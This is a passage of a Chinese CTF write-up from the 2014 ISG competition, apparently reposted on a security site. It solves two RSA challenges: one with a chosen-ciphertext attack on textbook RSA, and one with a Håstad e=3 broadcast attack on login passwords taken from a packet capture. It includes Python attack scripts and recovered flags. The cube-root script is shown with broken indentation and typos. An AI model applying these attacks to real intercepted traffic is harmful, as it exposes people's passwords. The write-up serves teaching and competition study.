N = 163299923594725837822065466024252288369968345166114296775267398674135203232399369097066231911703932876685787200953804367999219404652277507051132477767780777171583401548512406822302682440462953734186505877480309334593204565155837915080069002132147202319079756766392254726664638975415908872910181448796479878521
print c1*c2%N

一个python脚本

出来结果是

79179219947397673596913141858060853562264183277105064500526121181949051885226022286753492605088856943457103934674109091329935444332268497553408733577823437960592170878157899870065319472135912042160495919712578115084987878867194393987073798043704976793068142053136698484109814814341457569230801157307343303787

拿去RSA system解密一下

ISG RSA System
1. Encrypt
2. Decrypt
3. Debug
4. Exit
Command:
2
Input Ciphertext:
79179219947397673596913141858060853562264183277105064500526121181949051885226022286753492605088856943457103934674109091329935444332268497553408733577823437960592170878157899870065319472135912042160495919712578115084987878867194393987073798043704976793068142053136698484109814814341457569230801157307343303787
Your plaintext:
8667492895277923265820084477869219240741943135031931045224894975821878045181788438218135164652271568971126488881022071

把这个除以原来的3 在hex一下

print  hex(8667492895277923265820084477869219240741943135031931045224894975821878045181788438218135164652271568971126488881022071/3)


0x4953477b63686f73656e5f636970686572746578745f61747461636b5f627265616b735f74657874626f6f6b5f5253417dL

得到了secret 我们把他还原成flag.txt
2014 isg writeup
转换一下 得到flag
ISG{chosen_ciphertext_attack_breaks_textbook_RSA}

misc400 丫丫
题目先是给了一个数据包,用wireshark分析,在http包中发现很多login.php的请求包很里面有提交数数据及ip地址,尝试访问发现丫丫网地址:http://202.120.7.108:8888
2014 isg writeup
接着查看丫丫网代码,发现提交的密码是先使用rsa加密后的密文。
每次提交从http://202.120.7.108:8888/getEncryptionKey.php获取e,n,rkey,
看了一下js代码rkey似乎没有带入计算。
首先想到的是利用包重放攻击,更改数据包发送相同的user,pwd,rkey,发现根本就没有回显,此法扑街!

注意到此题为加密解密题,所以我们再次回到RSA这个算法来
这里现在我们知道得有密文C,公钥e=3,公共模数n,从数据包中把所有login.php和getEncryptionKey.php提交数据抠出来:共有7对对应的(C,n)
参考针对RSA的攻击这篇文章中提到的广播攻击
2014 isg writeup
现在所得条件完全吻合,用中国剩余定理解同余式组,设明文为p,x=p^3,x=Ci (mod ni)
分别带入7组(Ci,ni)可以解出x=p^3=

14175120305958926640522274902195014616103919921065164655367456408670873419507081538991868269775849615238493972279975630262653906377259396841374194697760562628284775693917230759371994102954191173508878632581527239741913791869171067933153829245033617552680775557775270598493476155753754082661600625507463981121359114994318974078353403670713130071785789595793053108726819835668999782112185208313059587572807230896036108000154937719170579624594507088699802103145938453191293254531505428598270849035967705837874786366450559794299140981395980232456955985348032373385754701012533791554105357639922066058704458092965519407348628154220014053751833930979073433233381842048652920738374791118798215011776212838115730376563369752704929738934158971230677165989193393929010702973551390350613081815668687122545410531336446086

接下来就是对这个数开立方,发现这个数根本无法开立方,再次扑街!

想了很久也试过其它方法,比如直接分解n,公共模数n特别的大,尝试了用msieve.exe来分解了很久,最后还是扑街!

后来想想觉得题目的公钥e给的是3,就说明这道题解法应该是没有错的,会不会是7次输入中,他有一次或者几次密码输入错误了,那样就导致同余式组中x=p^3并不完全相同,导致解出的答案不正确。
怎么判断哪些数组正确还是错误呢,想了很久也没有想到什么简便方法
最后还是通过暴力破解,就是从7组数据中分别取3组,4组,5组,6组,来组成同余式组,并解出所有的值。
python脚本:

n1=int('c0ee9a0e9267d408a38c11ad009cc013ec8047397cadbe81aef68929032c94e2e665afcc28031995b9f593a652910f41',16)
n2=int('98bd9bc15848d4fc9e6d45f7ed17be2b951c39a1beb94c34262d3bd4c841bea3afacb7c814a3806d5be14224384283a7',16)
n3=int('c6222103be7725ae3ab150786c0100ac424192c187d7c5c9311a09c3f871a6ba142f8db05e01c814203641a69285c55d',16)
n4=int('b5821c26739589a6f291f3f61b4833df1a1b0105202a4d70ddb2d411d999d4b55169f78d5dc3c9b8eb052a2832b218e5',16)
n5=int('c900f03ca5421a4fc73fe496d1d9298c6bd8d83d708ec4e609039ae5f163023549e3b3f31215e6c078023b86def18d3f',16)
n6=int('d069d27923ded540eadf2926f600f6ff373d0f325d2ea1de66f9c7571ecb8778fa07e2e4b23af7e614339147247754d1',16)
n7=int('c0618fdaf330901229661defee6ef221c5090138dec81f481add385d9b9f7f9927194fd79057c60e64bcfeac47332075',16)

b1=int('753f1c4d3bb0f170a227c7d925695cf1b33143fe1d2d6934e4c2b0faaebaef59bdfa02e656ce7e1957835b0011723654',16)
b2=int('42d6df231b6e09acd1f4e125b8d2458e3f294f34e3240001aba82f9ffd714187cdbcbc95dcf5bb34fcaeb48dad52bfc8',16)
b3=int('a6b92bde0560bdb36609186b3dbd034c2e60fdddf97bee03cfd9ffc9fe195208901abcb4a5e45f89d08fb79e20a61aa9',16)
b4=int('5163229bc6f60167c341ce5e8009dccb7a8bca6737023623c4f398bca5c0cc5dfe6f5d0e38bf06be3de162951f6fc472',16)
b5=int('5bab7fb7f32514c4fa859e213ae96cfc659b624a5e9446ef48503f16809b8447f206152f32f43f7219654cf41bca0e88',16)
b6=int('3282d69293ee95422445eb95af6d64f7c4a85ee5f14b5b9935121185142faf822497033bb29866e409d26a8aa821d92e',16)
b7=int('3f0c66ead6290124f0ab8274f0496b5296ec9e1ebf939ac643ca3adf2c9050948ca9e1f1da8130f5755f0ba887edbbab',16)
    
lst=[]
tar1=0
tar2=0

def ex_gcd(a,b):
    global tar1
    global tar2
    if b == 0:
        tar1=1
        tar2=0
    else:
        ex_gcd(b,a%b)
        t=tar1
        tar1=tar2
        tar2=t-a/b*tar2;
        
def gao(lst):
    checkitout=1
    heiweigou=0
    for x in lst:
        checkitout=checkitout*x[1]
    for x in lst:
        yo=checkitout/x[1];
        ex_gcd(yo,x[1])
        heiweigou=heiweigou+(x[0]*yo*(tar1%x[1]))%checkitout
    return (heiweigou+checkitout)%checkitout
lst1=[
     [b1,n1],
     [b2,n2],
     [b3,n3],
     [b4,n4],
     [b5,n5],
     [b6,n6],
     [b7,n7],
        ]
def do(start,cnt,ret):
    if cnt == 0:
        temp = []
        for i in ret:
            temp += [lst1[i]]
        print ret,':',gao(temp)
        return
    for i in range(start,7):
        do(i+1,cnt-1,ret+[i])
        
do(0,3,[])

然后对这些值开立方。最后2分钟的时候在对7组中取3组那35个结果中,最后开出了正确答案

p=1202453802380202612679414065556140558145904072876223837350171076616477832403508974630372232029686435268095467901
hex(p)=0x20000000000000000000000000000004953477b796179615f686168615f776177615f676167615f6775616775617d

截取后半部分4953477b796179615f686168615f776177615f676167615f6775616775617d
转化为ascii码ISG{yaya_haha_wawa_gaga_guagua}
得到flag
附上截图和代码:
2014 isg writeup

开立方根代码: l2.py

t1=4041883689533222751920250617404233450553335057728159774738477144172824727867054769407535152386382221081225013038431731518525625408525727797705810136226838277368756458035001570043808801815573869353444045507347000605541437441606187633840537240194856736314988862659955804800018274162934780506967023155818957441879247493850244755238674310809863672328
t2=17851482800376219283744703852299359032832916095865469893009247051337681787238783555942408217566675997938151667310182218054730320780037374762997174598501784189515793635398748080084594352942837823750575220223862794593288097399066157561382229978100522528248794899119569072464385007363573959767531242180810634355032603292485602012315837997928228258224
t3=14034361744822669136923887222655721155193560204666717614196823895507693649990220347445307635593701949815355451066920406376205509101244363551306821602113780930273803410715236249299834506365431556503273088925349085888801439018375454349054528271603690914264559813819042393487879358244175115337714944886292660606070197979160192854277808990098432026191
t4=4199494344433231870443835433052303371444170367108256108290023910416231434239251991828528819136461669876522959751842411292376271781993770887900092292359860111775734632398248264537785365344780834004785620745566933233687155034585038302527845818017305421195949218822522161447509181688559007949235794698112427132777934701136194022418947381488362094155
t5=4578673183897958151164893869108692295685521719483293338710797301376401666965641468744313868009961462330215443601560928924803787466214744118038974997117632248280536792185095404835383887131361055497987617460823915921616965601674672282989354803073623481033262408175230062252932659568699624760770644436929500896363703707239406444401528974168604627570
t6=9607180791757229160024175695536911620650260188656316825766875709970396297929617984432657215809793849093764022003733698222718724919683180859298829661825533171258378753592216950142208831217341184148378458837677525406549589368285647854078171220924224616219101184001607375356327024939178266680168426977187757420378480572599504277586416557302809254954
t7=20642904081007232870615158243828962874931850953305175261860392316967566693251721037676414065257010076931043091590630290243308564465518471655844421941153994350968114084127317533495102964564999519630106613458606815317014601444794622929010917297103656032030847714078305383858075067843040122682987809519979559936959855431673104731629223570708969181404
t8=11091469330828328243058727397232830468464624406416253164897689016570269138955368307822222272516676832191140926765065180683101187169817888255131187613162645536284744476290956219745672131918218719230090050301403973241127113957820147391587351369729386750840552974997974955898057905296745355185101545246395308785221250463758446788224769723980294990655
t9=18582068190863510222237984792647309947944317160839100487380498300030674714478044471426044587507216984278989346308047074015026193246173680338472238600746580894128562735129846247363296991675939465250310095503768597793884175700670632811193505553135361020191068211772674486750714545637197511136528763769793168314114532819690710385480108461663615975910
t10=24698450351188295654245391494628899418324534328578160681185786577327941554843565203709814855956796179133179846303289061675873521527637061986732330487319591170628650167698341845661794135402586847777927522675552531519037842557284435201731156929517319112922670674780267546178142233267659663561824867925415426017818939353075179133475857934003571146539
t11=1738622117183213887075009828299861477174439260238734505291778485381663406644543327878478022050214883852046386644704510229531335357271724376321071048639974406747376887870773524898879450012293891665978146277789782211332956905354458160095814830123669422019963572702409536327463481347931164889670554411901731332129735657207775752916633701
t12=19384822970424914836482455053156795777487093061204845030083018203837894883380856047793884962411762731502552085417296286419529708939882424516236216932587411433798319242277719057187632064549680107319312907893739147090599288634802294257064730246973221267055413825303215360219576018833472396503848539995975978962919877415524149816967571487630109449880
t13=8788554527595976324172119294263270532625852495221612374204904244489627412883076236877951205530859920025170824685255133997453807290000834735301608793922323157112422407932355660394688263432161748211628601881863417970448485171692783735006585097207561453675956796636985509920483425760019912145703069973685043729155011172826497028136132518465397366616
t14=22411511338471451252103639377419157725976518004646774599199725632752139096813358799550205479179491087873688472472164322817725827982296128857721363589791272266023229614014767647446642264151682872227605324354638720475308249989058776482008643974341708850278169701610114432662663166796301650952773994306927890549373606195487128505483561960508160184351
t15=12929788873066333284840338031535435307255748399437484068404292804246500962444119958788597585309589895500856612188483085477978979916343189512077424476303290148542743093767515550317462103085645112262950495237706480614004485613577081340753942973748141725112829700677555534117628706963762279725759647067849816354874740170747417415632647383667501350384
t16=12359463244465700702224808392821681974076839033776895360403897095365172965585436705035425178496962028446690945167766207379916344750145722197303089352071537450135158484357304128198729297479444705760441832994582500007306948116958697096448555058246828796354099100723162905212961119997919279591619851607676306083659836903439499589285499877565389377708
t17=18781422020275392353258813318736933796702434752557318113403755591466981487646391208952028155645597415009781619279533849387635470170059474361787320730185595506893061744584878690606283085493266502946022822651597736946672613558830136640528987790972493309379941842006705694754954290501450173975669853574933732298515379403985882221937569192668382756971
t18=16539960443077462151068370197157193665939003659153761257549198434222105878609166664048171427178544749472447430368303131858417885545230046821046410380577439617389096747275152560285665913872015380683179261480070447213087291325610237941734041176914041911792881671855751455596163686148449221702800713249370329565906228845206086233719973932254256781856
t19=11278312781058274228094564279233511786113100286903941211510141194568101276677054745959838304426777424639747384662474630093478991770675241447286906881927030560180116887453458626028692536718319348675423875398312908199760599675884450374009902633632684700867102132244674805352661201203294791344390564099392299412855427093290414077914615770282552646136
t20=18562330708124503099748943933662656326639596865985810524611265441534839771111177119303971661762166847498157288692877606447356855091999770375292905502101371598329035198745758918762042586116897789572450508269831359271028594614942681581679906578753659697362746896196830383800588213160700829057085910572643641111901564988981122585346545643924029768280
t21=10318284230732897607796392046281037185740760653931506533448434879410688411181170638513133021331426935483716225490072629342958628941190201641084586244187018827510385175445447030554877295616114956043419238650346968170626786372042160311377166163544894195077973760486880113426703918143339297830721258042771289518289725348360701887663600614392646141430
t22=14990418741535715771926000063311403325903402138171179387857980684862569709973231641775284898221663705433107236728748044160795299547043248277931314431288021596859540206386232103198848818295095230155701635133139443174760713021027587835293548894689880568294815506158275306330482120537684980655882197674182344447363089923280400436023486580705808393090
t23=14293883489651914053756521186769884357440736278040203606925666936440985692775225260308379591631466805161171951671979688645126815030473583233948343917355238858929497725006596045299643802985915690034870123073823664933375346522434886722016424078397675532270403191512042714226281235485987641317282632339788951874190130551940850097371318471818237536918
t24=3573279105622252947846398002246393051634703987123278311469555352908583056857151650179864566369692900992192699537678133173826452787501635279111410462874850118448410240025481471831996588849784926098010101836299967182563022946461796424396337523334084967895178856442566085140234524729504640228366787880652001835427104243413024891462519590119533464403
t25=10961720465687122328648303833532640225913573916857051795199965694130377248579027175744720908231090599721859990699967833824801545832074359557820042726018847293664839915282878164699221998322242766572567721103660497123096556856616463669758237235237654640251348175644406643232171622491084179214787976093815506350825023023632432770955433944478519950931
t26=26217632414191679053109488733210025515391559669134995760468000925502823161700915417923699916129593445859713349914754461832824847015518934340025684306787123451816953844277157748018455203005749252679059702426183264434165676335209298988652050275752769645919015438277906964587955259133030744890524951846209446793315383051440523155220946869499769657712
t27=7657084633846394906016978123777468467908126903919475367440170388679883559605494261714794121327711473201125330112276246453613940065889426733015072101136188709417624786744058198952106797791912023333998449497597713454452696847113218521806733198684308173793798519920079527011013434580753128765720661150834766112794144353631895353035650582679604845617
t28=2343502801916879890784003696424020729709007129782880777563445591878667148106665764356184980867566803039503289148059244872482590067757256099644215713019542335196239351654436734081316572618663817712433582561328074683922410392156920981125533764583142246883656412602227035336477837087935628968785654027378753316116957407760221364747003066874013585879
t29=19495352251977498048370814615824104567311605295567479163118959102358311425293855015766898557225251051455884396546942132573009708630687934777615465400689052863554776238864892366608858025810411424540368817693444432347980552698340675304407990315371917358398823676983111168934989944497189989274599698460197397933329581699328540995904828004959559299944
t30=10504518313577233585526426930928650580711710221983783424892413286989519467731301820052731782152017207265679030251912511498130851360845815112400698922823231793790978358866421450745072868995351000448213680701974025180526317468287744933546631829518263145511374727551308561225307579728746172556061245801580548750110914335305930060859393765914016625774
t31=18433847427878149004987882762554422279900047917090637634418177058601565323526793607402397237149332732385355225601294822689050152333235373891136011812577069244450386893624636561781406607373214147565693098728405756229193606010120175519030429257229676942523520252014706636981129226688139221948218297591969762627638399779436384229834096309774369528522
t32=1535706149581400739920306776716191463579024829768549812557823334316330606313485147367148393039861781879684189268112578474894624700814883359665362029261272279888384542269491321749413092333039363624766997313028873301557721609169677098317960576108807969863998999052673774361043444294594407664949703134965814055331765932788565995389839840810697688662
t33=13565500785848704635814593144837197544454236005474278430579925778323118791075118781377662661518174845621399550642538602455757446856953580413056218633806302400220734951002864386768902090465495072952225991491464023560450086981352007612141662487167900823291193761506513916055488193424389550058993254391005597445715109512705212428777291598408263196966
t34=12373601003669163343752673327921781806861413738331671244330759952753582630269973478343136396534175142941157215215390421385685708771356458903192858202532669530833600070045767713747032283044802736490124957289167105854049438982926658252954080285798867481999851323146828548629204859358369191722128628519899601387805747024004262192385088092823340200383
t35=7330841437220688673827561889989284469823772035255910984460023042949416408521981790913743802757865905579665380214127251816849376047814993545533194994357682512240681712325589367196912308736446507335079746753604255694733178677469618510744063864989498979391439147261769138627580711782879283434961038901592144263784234053611386353403587731563813360124
lst1=[
     [t1],
     [t2],
     [t3],
     [t4],
     [t5],
     [t6],
     [t7],
     [t8],
     [t9],
     [t10],
     [t11],
     [t12],
     [t13],
     [t14],
     [t15],
     [t16],
     [t17],
     [t18],
     [t19],
     [t20],
     [t21],
     [t22],
     [t23],
     [t24],
     [t25],
     [t26],
     [t27],
     [t28],
     [t29],
     [t30],
     [t31],
     [t32],
     [t33],
     [t34],
     [t35],


        ]
import math
def div(l,r):
global x
if l == r:
return 0
mid = (l + r) /2
temp = mid*mid*mid
if temp == x:
return mid
if temp > x:
return div(l,mid)
if temp < x:
return div(mid+1,r)
def pow10(x):
ret = 1
fori in range(0,x):
ret = ret * 10
return ret
def test(x):
    n = math.floor(math.log(x,10)/3)
    n = int(n)
left = pow10(n-2)-1
right = pow10(n+3)*9+1
ret = div(left,right)
return ret
index = 1
fori in lst1:
	x = i[0]
	index += 1
printindex,":",test(i[0])

结果是

1202453802380202612679414065556140558145904072876223837350171076616477832403508974630372232029686435268095467901

转成16进制

0x20000000000000000000000000000004953477b796179615f686168615f776177615f676167615f6775616775617dL

把4953477b796179615f686168615f776177615f676167615f6775616775617d转成ascii
ISG{yaya_haha_wawa_gaga_guagua}
得到了flag

0x05 后记
最后再给出一个官方的writeup吧
官方writeup

希望三叶草在决赛中能取得好成绩 大家加油~

FROM :appleu0.sinaapp.com | Author:appleu0

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月17日12:10:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2014 isg writeup http://cn-sec.com/archives/1012310.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: